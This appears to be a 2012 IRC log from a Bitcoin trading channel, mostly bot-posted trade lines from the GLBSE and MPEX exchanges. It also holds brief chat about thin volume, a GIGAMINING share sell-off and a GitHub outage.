[KRAKEN] 1 @ 0.00999999 BTC [-] Sep 10 05:17:20 [GLBSE] [GIGAMINING] 8 @ 0.70011 = 5.6009 BTC [-] Sep 10 05:18:28 [GLBSE] [GIGAMINING] 1 @ 0.70011 BTC [-] Sep 10 05:30:10 ;;ticker Sep 10 05:30:12 Best bid: 11.0243, Best ask: 11.10869, Bid-ask spread: 0.08439, Last trade: 11.1087, 24 hour volume: 13374, 24 hour low: 10.92452, 24 hour high: 11.14288 Sep 10 05:30:22 ;;bc,24hprc Sep 10 05:30:24 Error: I tried to send you an empty message. Sep 10 05:31:16 [MPEX] [S.MPOE] 200 @ 0.00039871 = 0.0797 BTC [+] Sep 10 05:36:11 [GLBSE] [TYGRR.BOT] 3 @ 0.91 = 2.73 BTC [-] Sep 10 05:36:36 [GLBSE] [OBSI.HRPT] 1 @ 0.10159996 BTC [-] Sep 10 05:36:58 [GLBSE] [DI.BFLSC.FAIL] 46 @ 0.001 = 0.046 BTC [+] Sep 10 05:44:38 [GLBSE] [SILVER] 6 @ 0.01 = 0.06 BTC [+] Sep 10 05:45:35 [GLBSE] [BTCS] 1 @ 0.011 BTC [+] Sep 10 06:00:33 [GLBSE] [BFLS] 5 @ 0.979 = 4.895 BTC [+] Sep 10 06:10:28 [MPEX] [S.MPOE] 17427 @ 0.00039888 = 6.9513 BTC [+] Sep 10 06:17:56 [MPEX] [S.MPOE] 6673 @ 0.00039888 = 2.6617 BTC [+] Sep 10 06:20:34 [MPEX] [S.MPOE] 200 @ 0.00039508 = 0.079 BTC [-] Sep 10 06:20:35 [MPEX] [S.MPOE] 28353 @ 0.00039487 = 11.1957 BTC [-] Sep 10 06:20:37 [MPEX] [S.MPOE] 24147 @ 0.00039453 = 9.5267 BTC [-] Sep 10 06:37:48 [MPEX] [S.DICE] 38150 @ 0.0034 = 129.71 BTC [+] Sep 10 06:56:22 [GLBSE] [TYGRR.BOND-P] 50 @ 0.05 = 2.5 BTC [-] Sep 10 07:02:36 ;;ticker Sep 10 07:02:37 Best bid: 11.04, Best ask: 11.11, Bid-ask spread: 0.07000, Last trade: 11.04, 24 hour volume: 14003, 24 hour low: 10.92452, 24 hour high: 11.1419 Sep 10 07:02:45 o wow, 14k volume ? incredible. Sep 10 07:05:23 slow night i guess Sep 10 07:06:07 i guess w/o btccharts nobody trades Sep 10 07:07:57 https://mtgox.com/press_release_20110811.html Sep 10 07:08:03 how little has changed, in retrospect Sep 10 07:08:09 august 2012, august 2011, same difference. Sep 10 07:09:13 [GLBSE] [BDT] 1 @ 1.045 BTC [-] Sep 10 07:17:01 [GLBSE] [GIGAMINING] 2 @ 0.7199 = 1.4398 BTC [+] Sep 10 07:17:46 [GLBSE] [ASICMINER] 1 @ 0.1019 BTC [+] Sep 10 07:18:29 [GLBSE] [FUTUREFUND] 100 @ 0.000123 = 0.0123 BTC [+] Sep 10 07:24:59 [MPEX] [S.MPOE] 200 @ 0.00039497 = 0.079 BTC [+] Sep 10 07:25:01 [MPEX] [S.MPOE] 10700 @ 0.00039528 = 4.2295 BTC [+] Sep 10 07:26:44 [MPEX] [O.BTCUSD.P090T] 15 @ 0.05975305 = 0.8963 BTC [+] Sep 10 07:27:59 o hey it's back! Sep 10 07:30:06 [GLBSE] [ASICMINER] 1 @ 0.1019 BTC [+] Sep 10 07:30:33 [GLBSE] [JLP-BMD] 1 @ 0.0499 BTC [-] Sep 10 07:31:32 [MPEX] [F.GIGA.ETF] 7700 @ 0.00064877 = 4.9955 BTC [+] Sep 10 07:31:34 [MPEX] [F.GIGA.ETF] 12200 @ 0.00064247 = 7.8381 BTC [-] Sep 10 07:36:54 [MPEX] [S.BVPS] 150 @ 0.00351853 = 0.5278 BTC [+] Sep 10 07:39:00 [GLBSE] [GSDPT] 115 @ 0.003395 = 0.3904 BTC [-] Sep 10 07:41:53 [GLBSE] [TEEK.B] 4 @ 0.4001 = 1.6004 BTC [-] Sep 10 07:41:58 [GLBSE] [ASICMINER] 1 @ 0.1019 BTC [+] Sep 10 07:43:38 [GLBSE] [YABMC] 1 @ 0.115 BTC [+] Sep 10 07:43:39 [GLBSE] [YABMC] 19 @ 0.115 = 2.185 BTC [+] Sep 10 08:02:58 [MPEX] [F.GIGA.ETF] 4469 @ 0.00064247 = 2.8712 BTC [-] Sep 10 08:02:59 [MPEX] [F.GIGA.ETF] 16595 @ 0.00064207 = 10.6552 BTC [-] Sep 10 08:14:09 [GLBSE] [FUTUREFUND] 1 @ 0.000123 BTC [+] Sep 10 08:34:32 [MPEX] [S.MPOE] 200 @ 0.00039488 = 0.079 BTC [-] Sep 10 08:34:33 [MPEX] [S.MPOE] 13261 @ 0.00039453 = 5.2319 BTC [-] Sep 10 08:34:35 [MPEX] [S.MPOE] 14739 @ 0.0003945 = 5.8145 BTC [-] Sep 10 08:34:43 [GLBSE] [OBSI.HRPT] 2 @ 0.10159994 = 0.2032 BTC [-] Sep 10 08:41:47 [MPEX] [S.MPOE] 35961 @ 0.0003945 = 14.1866 BTC [-] Sep 10 08:41:49 [MPEX] [S.MPOE] 4239 @ 0.00039449 = 1.6722 BTC [-] **** BEGIN LOGGING AT Mon Sep 10 15:06:02 2012 Sep 10 15:07:26 [GLBSE] [BITBOND] 2 @ 0.3911 = 0.7822 BTC [-] Sep 10 15:17:21 [MPEX] [S.MPOE] 200 @ 0.00039496 = 0.079 BTC [-] Sep 10 15:17:23 [MPEX] [S.MPOE] 4700 @ 0.00039473 = 1.8552 BTC [-] Sep 10 15:17:24 [MPEX] [S.MPOE] 32761 @ 0.0003935 = 12.8915 BTC [-] Sep 10 15:17:25 [MPEX] [S.MPOE] 12426 @ 0.00039344 = 4.8889 BTC [-] Sep 10 15:18:53 [MPEX] [O.BTCUSD.P110T] 935 @ 0.15329735 = 143.333 BTC [-] Sep 10 15:20:14 [GLBSE] [BITBOND] 1 @ 0.3996 BTC [+] Sep 10 15:23:05 [GLBSE] [ASICMINER] 62 @ 0.102 = 6.324 BTC [+] Sep 10 15:24:13 [GLBSE] [ASICMINER] 57 @ 0.103 = 5.871 BTC [+] Sep 10 15:24:15 [GLBSE] [ASICMINER] 43 @ 0.103 = 4.429 BTC [+] Sep 10 15:25:58 [GLBSE] [MMM] 1 @ 0.94 BTC [+] Sep 10 15:30:20 [GLBSE] [ASICMINER] 5 @ 0.104 = 0.52 BTC [+] Sep 10 15:35:45 [GLBSE] [TYGRR.BOND-A] 7 @ 0.12 = 0.84 BTC [-] Sep 10 15:43:50 [GLBSE] [OBSI.HRPT] 8 @ 0.10159994 = 0.8128 BTC [+] Sep 10 15:46:00 [GLBSE] [TYGRR.BOND-A] 3 @ 0.12 = 0.36 BTC [-] Sep 10 15:50:01 [GLBSE] [GIGAMINING] 5 @ 0.70021 = 3.5011 BTC [+] Sep 10 15:50:03 [GLBSE] [GIGAMINING] 33 @ 0.70011 = 23.1036 BTC [-] Sep 10 15:51:07 [MPEX] [S.MPOE] 23974 @ 0.00039344 = 9.4323 BTC [-] Sep 10 15:51:09 [MPEX] [S.MPOE] 9172 @ 0.00039339 = 3.6082 BTC [-] Sep 10 15:51:50 [GLBSE] [GIGAMINING] 2 @ 0.6999 = 1.3998 BTC [-] Sep 10 15:52:50 [GLBSE] [ASICMINER] 4 @ 0.1021 = 0.4084 BTC [-] Sep 10 15:52:51 [GLBSE] [ASICMINER] 252 @ 0.102 = 25.704 BTC [-] Sep 10 16:00:13 [MPEX] [S.MPOE] 200 @ 0.00039553 = 0.0791 BTC [+] Sep 10 16:00:32 [GLBSE] [GMVT-BOT] 1 @ 0.15 BTC [-] Sep 10 16:00:48 [MPEX] [S.MPOE] 35000 @ 0.00039594 = 13.8579 BTC [+] Sep 10 16:04:51 [MPEX] [S.MPOE] 100 @ 0.00039594 = 0.0396 BTC [+] Sep 10 16:21:44 [MPEX] [S.MPOE] 200 @ 0.00039493 = 0.079 BTC [-] Sep 10 16:21:46 [MPEX] [S.MPOE] 10500 @ 0.0003946 = 4.1433 BTC [-] Sep 10 16:27:57 [GLBSE] [ASICMINER] 1 @ 0.1046 BTC [+] Sep 10 16:30:23 [GLBSE] [GIGAMINING] 2 @ 0.69959897 = 1.3992 BTC [-] Sep 10 16:30:25 [GLBSE] [GIGAMINING] 7 @ 0.69959898 = 4.8972 BTC [+] Sep 10 16:30:26 [GLBSE] [GIGAMINING] 8 @ 0.69979899 = 5.5984 BTC [+] Sep 10 16:32:00 [GLBSE] [BITBOND] 3 @ 0.3996 = 1.1988 BTC [+] Sep 10 16:32:09 [GLBSE] [OBSI.HRPT] 14 @ 0.10159994 = 1.4224 BTC [+] Sep 10 16:33:08 [GLBSE] [YABMC] 2 @ 0.1149 = 0.2298 BTC [-] Sep 10 16:33:51 https://bitcointalk.org/index.php?topic=108375.0 Sep 10 16:38:02 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 10 16:39:25 oh fuck Sep 10 16:39:27 MORE asics Sep 10 16:48:13 [GLBSE] [ASICMINER] 3 @ 0.1046 = 0.3138 BTC [+] Sep 10 16:50:30 [GLBSE] [OBSI.HRPT] 4 @ 0.10159994 = 0.4064 BTC [+] Sep 10 16:56:51 [GLBSE] [MMM] 5 @ 0.94 = 4.7 BTC [+] Sep 10 17:01:42 [GLBSE] [GIGAMINING] 5 @ 0.6852 = 3.426 BTC [-] Sep 10 17:01:43 [GLBSE] [GIGAMINING] 3 @ 0.6851 = 2.0553 BTC [-] Sep 10 17:01:44 [GLBSE] [GIGAMINING] 8 @ 0.68509999 = 5.4808 BTC [-] Sep 10 17:01:45 [GLBSE] [GIGAMINING] 5 @ 0.685 = 3.425 BTC [-] Sep 10 17:01:47 [GLBSE] [GIGAMINING] 5 @ 0.6601 = 3.3005 BTC [-] Sep 10 17:01:48 [GLBSE] [GIGAMINING] 5 @ 0.66 = 3.3 BTC [-] Sep 10 17:01:49 [GLBSE] [GIGAMINING] 5 @ 0.62 = 3.1 BTC [-] Sep 10 17:01:50 [GLBSE] [GIGAMINING] 5 @ 0.61 = 3.05 BTC [-] Sep 10 17:01:51 [GLBSE] [GIGAMINING] 9 @ 0.601 = 5.409 BTC [-] Sep 10 17:01:52 [GLBSE] [GIGAMINING] 29 @ 0.600011 = 17.4003 BTC [-] Sep 10 17:01:53 [GLBSE] [GIGAMINING] 35 @ 0.60001 = 21.0004 BTC [-] Sep 10 17:01:54 [GLBSE] [GIGAMINING] 1 @ 0.6 BTC [-] Sep 10 17:01:55 [GLBSE] [GIGAMINING] 5 @ 0.6 = 3 BTC [-] Sep 10 17:01:56 [GLBSE] [GIGAMINING] 100 @ 0.6 = 60 BTC [-] Sep 10 17:07:45 someone came to their senses Sep 10 17:10:31 [MPEX] [S.MPOE] 200 @ 0.00039533 = 0.0791 BTC [+] Sep 10 17:10:32 [MPEX] [S.MPOE] 29700 @ 0.00039559 = 11.749 BTC [+] Sep 10 17:10:34 [MPEX] [S.MPOE] 14927 @ 0.00039599 = 5.9109 BTC [+] Sep 10 17:10:35 [MPEX] [S.MPOE] 4400 @ 0.00039609 = 1.7428 BTC [+] Sep 10 17:12:31 [GLBSE] [ASICMINER] 1 @ 0.10231 BTC [-] Sep 10 17:12:33 [GLBSE] [ASICMINER] 4 @ 0.1023 = 0.4092 BTC [-] Sep 10 17:12:34 [GLBSE] [ASICMINER] 56 @ 0.1022 = 5.7232 BTC [-] Sep 10 17:12:35 [GLBSE] [ASICMINER] 39 @ 0.102 = 3.978 BTC [-] Sep 10 17:13:04 damned internets Sep 10 17:13:14 [10:02:07] o.O Sep 10 17:13:15 [10:07:43] someone came to their senses Sep 10 17:14:58 OH FUCK Sep 10 17:14:59 GITHUB IS DOWN Sep 10 17:15:34 [GLBSE] [GIGAMINING] 1 @ 0.5321 BTC [-] Sep 10 17:18:33 [GLBSE] [ASICMINER] 4 @ 0.1021 = 0.4084 BTC [+] Sep 10 17:18:35 [GLBSE] [ASICMINER] 11 @ 0.102 = 1.122 BTC [-] Sep 10 17:22:26 [GLBSE] [OBSI.HRPT] 2 @ 0.1011 = 0.2022 BTC [-] Sep 10 17:25:08 [GLBSE] [OBSI.HRPT] 1 @ 0.10159994 BTC [+] Sep 10 17:30:55 [GLBSE] [ARS] 25 @ 0.0153 = 0.3825 BTC [+] Sep 10 17:33:00 [GLBSE] [OBSI.HRPT] 38 @ 0.101 = 3.838 BTC [-] Sep 10 17:34:31 [GLBSE] [OBSI.HRPT] 14 @ 0.10159994 = 1.4224 BTC [+] Sep 10 17:35:15 [GLBSE] [GIGAMINING] 5 @ 0.5324 = 2.662 BTC [+] Sep 10 17:35:17 [GLBSE] [GIGAMINING] 3 @ 0.5323 = 1.5969 BTC [-] Sep 10 17:35:18 [GLBSE] [GIGAMINING] 10 @ 0.5322 = 5.322 BTC [-] Sep 10 17:35:20 [GLBSE] [GIGAMINING] 3 @ 0.532 = 1.596 BTC [-] Sep 10 17:35:21 [GLBSE] [GIGAMINING] 10 @ 0.51 = 5.1 BTC [-] Sep 10 17:35:21 [GLBSE] [GIGAMINING] 40 @ 0.505 = 20.2 BTC [-] Sep 10 17:35:22 [GLBSE] [GIGAMINING] 9 @ 0.501 = 4.509 BTC [-] Sep 10 17:35:23 [GLBSE] [GIGAMINING] 10 @ 0.5 = 5 BTC [-] Sep 10 17:35:48 [MPEX] [F.GIGA.ETF] 14100 @ 0.00062365 = 8.7935 BTC [-] Sep 10 17:37:10 [GLBSE] [OBSI.HRPT] 4 @ 0.101 = 0.404 BTC [-] Sep 10 17:37:11 [GLBSE] [OBSI.HRPT] 60 @ 0.1 = 6 BTC [-] Sep 10 17:40:11 [GLBSE] [ASICMINER] 4 @ 0.1021 = 0.4084 BTC [+] Sep 10 17:40:15 [GLBSE] [ASICMINER] 22 @ 0.102 = 2.244 BTC [-] Sep 10 17:40:17 [GLBSE] [ASICMINER] 7 @ 0.1011 = 0.7077 BTC [-] Sep 10 17:40:18 [GLBSE] [ASICMINER] 2 @ 0.101 = 0.202 BTC [-] Sep 10 17:40:19 [GLBSE] [ASICMINER] 5 @ 0.101 = 0.505 BTC [-] Sep 10 17:40:20 [GLBSE] [ASICMINER] 25 @ 0.1 = 2.5 BTC [-] Sep 10 17:40:21 [GLBSE] [ASICMINER] 35 @ 0.1 = 3.5 BTC [-] Sep 10 17:42:48 [GLBSE] [GIGAMINING] 10 @ 0.48 = 4.8 BTC [-] Sep 10 17:42:50 [GLBSE] [GIGAMINING] 5 @ 0.48 = 2.4 BTC [-] Sep 10 17:44:21 [GLBSE] [GIGAMINING] 5 @ 0.5 = 2.5 BTC [+] Sep 10 17:45:29 [GLBSE] [GIGAMINING] 1 @ 0.6 BTC [+] Sep 10 17:47:11 !pl CPA GLBSE Sep 10 17:47:11 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 10 17:47:23 GIVE ME MY DATA Sep 10 17:47:50 CPA [1@BTC] paid: 0.00569688 BTC. Last price: 0.031 BTC. Capital gain: 0.031 BTC. Total: 0.03669688 BTC. (-100%) Sep 10 17:48:13 [GLBSE] [RSM] 9 @ 0.3 = 2.7 BTC [+] Sep 10 17:48:18 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 10 17:48:42 CPA [1@0.06BTC] paid: 0.00569688 BTC. Last price: 0.031 BTC. Capital gain: -0.029 BTC. Total: -0.02330312 BTC. (-38.8%) Sep 10 17:48:58 [GLBSE] [GIGAMINING] 10 @ 0.5 = 5 BTC [-] Sep 10 17:49:03 you need a date too, unless you want to go from the beginning Sep 10 17:50:17 [GLBSE] [GIGAMINING] 83 @ 0.5 = 41.5 BTC [-] Sep 10 17:52:09 [GLBSE] [FPGA.CONTRACT] 1 @ 0.0718 BTC [+] Sep 10 17:53:14 [GLBSE] [GMVT-BOT] 1 @ 0.15 BTC [-] Sep 10 17:54:06 [GLBSE] [DI.BFLSC.FAIL] 35 @ 0.001 = 0.035 BTC [+] Sep 10 17:57:52 [GLBSE] [GIGAMINING] 5 @ 0.47 = 2.35 BTC [-] Sep 10 18:02:29 usagi: I always buy when there is blood in the streets. Sep 10 18:03:31 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Sep 10 18:08:46 http://www.reddit.com/r/conspiracy/comments/zmw9r/ben_bernankes_office_phone_number_is_2024522955/ Sep 10 18:09:03 lol That guy in the comments had a lot of balls calling Bernanke and asking him about his investments Sep 10 18:09:10 [MPEX] [S.MPOE] 11473 @ 0.00039703 = 4.5551 BTC [+] Sep 10 18:09:11 [MPEX] [S.MPOE] 6827 @ 0.00039471 = 2.6947 BTC [-] Sep 10 18:14:39 [MPEX] [S.MPOE] 200 @ 0.00039558 = 0.0791 BTC [+] Sep 10 18:14:41 [MPEX] [S.MPOE] 6873 @ 0.00039471 = 2.7128 BTC [-] Sep 10 18:14:42 [MPEX] [S.MPOE] 20600 @ 0.0003946 = 8.1288 BTC [-] Sep 10 18:14:43 [MPEX] [S.MPOE] 11027 @ 0.00039339 = 4.3379 BTC [-] Sep 10 18:14:54 [GLBSE] [GIGAMINING] 1 @ 0.47 BTC [-] Sep 10 18:16:16 [GLBSE] [BFLS.RIG] 1 @ 0.87 BTC [-] Sep 10 18:16:18 [GLBSE] [BFLS.RIG] 4 @ 0.865 = 3.46 BTC [-] Sep 10 18:16:19 [GLBSE] [BFLS.RIG] 3 @ 0.850001 = 2.55 BTC [-] Sep 10 18:16:20 [GLBSE] [BFLS.RIG] 3 @ 0.85 = 2.55 BTC [-] Sep 10 18:17:02 [GLBSE] [BITBOND] 5 @ 0.3911 = 1.9555 BTC [-] Sep 10 18:17:03 [GLBSE] [BITBOND] 3 @ 0.391 = 1.173 BTC [-] Sep 10 18:17:04 [GLBSE] [BITBOND] 10 @ 0.39021001 = 3.9021 BTC [-] Sep 10 18:17:05 [GLBSE] [BITBOND] 20 @ 0.39021 = 7.8042 BTC [-] Sep 10 18:20:18 [GLBSE] [BITBOND] 5 @ 0.386 = 1.93 BTC [-] Sep 10 18:20:35 [GLBSE] [GIGAMINING] 20 @ 0.47 = 9.4 BTC [-] Sep 10 18:25:04 [GLBSE] [BFLS] 6 @ 0.80001 = 4.8001 BTC [-] Sep 10 18:25:06 [GLBSE] [BFLS] 2 @ 0.8 = 1.6 BTC [-] Sep 10 18:25:07 [GLBSE] [BFLS] 1 @ 0.8 BTC [-] Sep 10 18:28:30 [MPEX] [S.MPOE] 200 @ 0.00039728 = 0.0795 BTC [+] Sep 10 18:28:32 [MPEX] [S.MPOE] 7885 @ 0.0003975 = 3.1343 BTC [+] Sep 10 18:30:42 [GLBSE] [GIGAMINING] 1 @ 0.47 BTC [-] Sep 10 18:34:34 [GLBSE] [GIGAMINING] 10 @ 0.47 = 4.7 BTC [-] Sep 10 18:45:34 [GLBSE] [GIGAMINING] 7 @ 0.4699 = 3.2893 BTC [-] Sep 10 18:48:53 [GLBSE] [GIGAMINING] 8 @ 0.47 = 3.76 BTC [+] Sep 10 18:50:26 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Sep 10 18:53:25 [GLBSE] [GIGAMINING] 10 @ 0.47 = 4.7 BTC [+] Sep 10 18:54:29 [GLBSE] [FUTUREFUND] 500 @ 0.000123 = 0.0615 BTC [+] Sep 10 18:55:21 [GLBSE] [GIGAMINING] 40 @ 0.47 = 18.8 BTC [+] Sep 10 19:19:31 [GLBSE] [BDK.BND] 41 @ 0.1 = 4.1 BTC [-] Sep 10 19:20:26 [GLBSE] [GIGAMINING] 2 @ 0.47 = 0.94 BTC [+] Sep 10 19:22:19 [GLBSE] [GIGAMINING] 40 @ 0.47 = 18.8 BTC [+] Sep 10 19:26:25 [GLBSE] [NYAN.A] 2 @ 1 = 2 BTC [+] Sep 10 19:30:29 [MPEX] [B.MPCD.C] 50000 @ 0.00103702 = 51.851 BTC [+] Sep 10 19:31:10 [MPEX] [F.GIGA.ETF] 17200 @ 0.00062365 = 10.7268 BTC [-] Sep 10 19:31:12 [MPEX] [F.GIGA.ETF] 22900 @ 0.00061782 = 14.1481 BTC [-] Sep 10 19:31:13 [MPEX] [F.GIGA.ETF] 26520 @ 0.00061423 = 16.2894 BTC [-] Sep 10 19:31:14 [MPEX] [F.GIGA.ETF] 24700 @ 0.00061208 = 15.1184 BTC [-] Sep 10 19:31:15 [MPEX] [F.GIGA.ETF] 1500 @ 0.00061028 = 0.9154 BTC [-] Sep 10 19:31:16 [MPEX] [F.GIGA.ETF] 17100 @ 0.0006085 = 10.4054 BTC [-] Sep 10 19:31:17 [MPEX] [F.GIGA.ETF] 29269 @ 0.0006009 = 17.5877 BTC [-] Sep 10 19:31:18 [MPEX] [F.GIGA.ETF] 16740 @ 0.00059176 = 9.9061 BTC [-] Sep 10 19:31:19 [MPEX] [F.GIGA.ETF] 33900 @ 0.00054527 = 18.4847 BTC [-] Sep 10 19:31:20 [MPEX] [F.GIGA.ETF] 16191 @ 0.00053395 = 8.6452 BTC [-] Sep 10 19:31:21 [MPEX] [F.GIGA.ETF] 43980 @ 0.0005 = 21.99 BTC [-] Sep 10 19:33:02 [GLBSE] [BDK.BND] 1 @ 0.1005 BTC [+] Sep 10 19:33:04 [MPEX] [F.GIGA.ETF] 59357 @ 0.0005 = 29.6785 BTC [-] Sep 10 19:33:05 [MPEX] [F.GIGA.ETF] 25247 @ 0.00049779 = 12.5677 BTC [-] Sep 10 19:33:07 [MPEX] [F.GIGA.ETF] 396 @ 0.00038 = 0.1505 BTC [-] Sep 10 19:33:40 [GLBSE] [YARR] 1 @ 1 BTC [-] Sep 10 19:36:09 [GLBSE] [GIGAMINING] 10 @ 0.47 = 4.7 BTC [+] Sep 10 19:38:04 [MPEX] [S.MPOE] 21615 @ 0.0003975 = 8.592 BTC [+] Sep 10 19:38:06 [MPEX] [S.MPOE] 27585 @ 0.00039792 = 10.9766 BTC [+] Sep 10 19:40:16 jesus Sep 10 19:40:23 !pl gigamining 1.5 Sep 10 19:40:24 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 10 19:40:44 GIGAMINING [1@1.5BTC] paid: 0.44317596 BTC. Last price: 0.47 BTC. Capital gain: -1.03 BTC. Total: -0.58682404 BTC. (-39.1%) Sep 10 19:40:48 !pl gigamining 1 Sep 10 19:40:49 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 10 19:40:55 GIGAMINING [1@1BTC] paid: 0.44317596 BTC. Last price: 0.47 BTC. Capital gain: -0.53 BTC. Total: -0.08682404 BTC. (-8.7%) Sep 10 19:41:07 so by now even the people who bought at ipo prices are underwater. Sep 10 19:41:52 http://polimedia.us/dtng/c/src/134654389322.png Sep 10 19:42:01 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Sep 10 19:42:02 giga is crashing? Sep 10 19:42:36 [GLBSE] [BLUECHIP] 100 @ 0.1 = 10 BTC Sep 10 19:43:21 has been for about a week Sep 10 19:43:22 [MPEX] [S.MPOE] 25694 @ 0.00039792 = 10.2242 BTC [+] Sep 10 19:43:23 [MPEX] [S.MPOE] 8706 @ 0.00039798 = 3.4648 BTC [+] Sep 10 19:43:24 but now it's under 5. Sep 10 19:43:33 nice. Sep 10 19:46:51 [GLBSE] [GIGAMINING] 3 @ 0.47 = 1.41 BTC [+] Sep 10 19:57:55 [GLBSE] [OBSI.HRPT] 5 @ 0.1 = 0.5 BTC [-] Sep 10 20:03:34 needs moar a Sep 10 20:04:58 hm Sep 10 20:10:04 [GLBSE] [GIGAMINING] 1 @ 0.47 BTC [+] Sep 10 20:11:30 [GLBSE] [GIGAMINING] 49 @ 0.47 = 23.03 BTC [+] Sep 10 20:16:39 [GLBSE] [GIGAMINING] 5 @ 0.497 = 2.485 BTC [+] Sep 10 20:20:56 [GLBSE] [GIGAMINING] 12 @ 0.5 = 6 BTC [+] Sep 10 20:23:13 [MPEX] [S.MPOE] 200 @ 0.0003971 = 0.0794 BTC [-] Sep 10 20:23:14 [MPEX] [S.MPOE] 14100 @ 0.00039631 = 5.588 BTC [-] Sep 10 20:23:22 [GLBSE] [TYGRR.BOND-P] 1 @ 0.05 BTC [-] Sep 10 20:23:55 [GLBSE] [GIGAMINING] 24 @ 0.5 = 12 BTC [+] Sep 10 20:28:57 [GLBSE] [GSDPT] 3 @ 0.0033 = 0.0099 BTC [-] Sep 10 20:28:58 [GLBSE] [GSDPT] 3 @ 0.00321 = 0.0096 BTC [-] Sep 10 20:29:00 [GLBSE] [GSDPT] 155 @ 0.00321 = 0.4976 BTC [-] Sep 10 20:29:01 [GLBSE] [GSDPT] 700 @ 0.00321 = 2.247 BTC [-] Sep 10 20:29:02 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC [-] Sep 10 20:29:03 [GLBSE] [GSDPT] 260 @ 0.00319 = 0.8294 BTC [-] Sep 10 20:31:12 [GLBSE] [GIGAMINING] 1 @ 0.5 BTC [+] Sep 10 20:32:34 [GLBSE] [GSDPT] 1 @ 0.003155 BTC [-] Sep 10 20:32:35 [GLBSE] [GSDPT] 40 @ 0.00314 = 0.1256 BTC [-] Sep 10 20:32:36 [GLBSE] [GSDPT] 8 @ 0.00313 = 0.025 BTC [-] Sep 10 20:32:37 [GLBSE] [GSDPT] 8 @ 0.00312 = 0.025 BTC [-] Sep 10 20:32:39 [GLBSE] [GSDPT] 1334 @ 0.00311 = 4.1487 BTC [-] Sep 10 20:36:45 [GLBSE] [GIGAMINING] 13 @ 0.5 = 6.5 BTC [+] Sep 10 20:38:13 [GLBSE] [ARS] 35 @ 0.0155 = 0.5425 BTC [+] Sep 10 20:38:18 [GLBSE] [FPGAMINING] 1 @ 0.799 BTC [+] Sep 10 20:38:20 [GLBSE] [FPGAMINING] 4 @ 0.799 = 3.196 BTC [+] Sep 10 20:38:21 [GLBSE] [FPGAMINING] 5 @ 0.79969999 = 3.9985 BTC [+] Sep 10 20:38:22 [GLBSE] [FPGAMINING] 10 @ 0.7997 = 7.997 BTC [+] Sep 10 20:38:24 [GLBSE] [FPGAMINING] 30 @ 0.8 = 24 BTC [+] Sep 10 20:38:25 [GLBSE] [ASICMINER] 6 @ 0.1039 = 0.6234 BTC [+] Sep 10 20:38:26 [GLBSE] [ASICMINER] 14 @ 0.104 = 1.456 BTC [+] Sep 10 20:41:57 [GLBSE] [SS] 1 @ 0.019 BTC [+] Sep 10 20:41:59 [GLBSE] [SS] 2 @ 0.0188 = 0.0376 BTC [-] Sep 10 20:42:00 [GLBSE] [SS] 1 @ 0.01825 BTC [-] Sep 10 20:42:01 [GLBSE] [SS] 10 @ 0.0181 = 0.181 BTC [-] Sep 10 20:42:03 [GLBSE] [SS] 1 @ 0.018 BTC [-] Sep 10 20:42:04 [GLBSE] [SS] 427 @ 0.018 = 7.686 BTC [-] Sep 10 20:43:30 [GLBSE] [PPT.E] 4 @ 0.32 = 1.28 BTC [-] Sep 10 20:43:51 [GLBSE] [PPT.E] 3 @ 0.32 = 0.96 BTC [-] Sep 10 20:44:29 [GLBSE] [FPGAMINING] 1 @ 0.8 BTC [+] Sep 10 20:45:13 [GLBSE] [ASICMINER] 8 @ 0.104 = 0.832 BTC [+] Sep 10 20:48:18 [GLBSE] [TYGRR.BOND-P] 1 @ 0.047 BTC [-] Sep 10 20:48:53 [GLBSE] [PPT.E] 9 @ 0.32 = 2.88 BTC [-] Sep 10 20:49:36 [GLBSE] [OBSI.HRPT] 2 @ 0.095 = 0.19 BTC [-] Sep 10 20:54:01 [GLBSE] [GIGAMINING] 1 @ 0.5 BTC [+] Sep 10 20:57:58 [GLBSE] [GIGAMINING] 99 @ 0.5 = 49.5 BTC [+] Sep 10 20:58:05 [GLBSE] [GOLD] 1 @ 0.00989 BTC [+] Sep 10 20:58:42 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Sep 10 21:03:17 [GLBSE] [OBSI.HRPT] 12 @ 0.098 = 1.176 BTC [+] Sep 10 21:03:56 [GLBSE] [OBSI.HRPT] 90 @ 0.09999999 = 9 BTC [+] Sep 10 21:05:59 [GLBSE] [TYGRR.BOND-P] 170 @ 0.037 = 6.29 BTC [-] Sep 10 21:06:01 [GLBSE] [TYGRR.BOND-P] 14 @ 0.036 = 0.504 BTC [-] Sep 10 21:06:02 [GLBSE] [TYGRR.BOND-P] 50 @ 0.036 = 1.8 BTC [-] Sep 10 21:06:03 [GLBSE] [TYGRR.BOND-P] 11 @ 0.03518876 = 0.3871 BTC [-] Sep 10 21:06:04 [GLBSE] [TYGRR.BOND-P] 7 @ 0.03476398 = 0.2433 BTC [-] Sep 10 21:06:05 [GLBSE] [TYGRR.BOND-P] 10 @ 0.034 = 0.34 BTC [-] Sep 10 21:06:06 [GLBSE] [TYGRR.BOND-P] 200 @ 0.034 = 6.8 BTC [-] Sep 10 21:06:07 [GLBSE] [TYGRR.BOND-P] 10 @ 0.034 = 0.34 BTC [-] Sep 10 21:06:09 [GLBSE] [TYGRR.BOND-P] 798 @ 0.0330001 = 26.3341 BTC [-] Sep 10 21:06:21 [GLBSE] [OBSI.HRPT] 220 @ 0.09999999 = 22 BTC [+] Sep 10 21:06:39 [GLBSE] [OBSI.HRPT] 158 @ 0.09999999 = 15.8 BTC [+] Sep 10 21:06:40 [GLBSE] [OBSI.HRPT] 26 @ 0.1 = 2.6 BTC [+] Sep 10 21:06:41 [GLBSE] [OBSI.HRPT] 16 @ 0.1 = 1.6 BTC [+] Sep 10 21:07:11 [GLBSE] [OBSI.HRPT] 28 @ 0.1 = 2.8 BTC [+] Sep 10 21:07:21 oh shit Sep 10 21:07:39 i predicted the mnw bet outcome, he used it as an excuse to leave! Sep 10 21:08:35 [GLBSE] [OBSI.HRPT] 3 @ 0.10159994 = 0.3048 BTC [+] Sep 10 21:09:49 [GLBSE] [PUREMINING] 3 @ 0.096 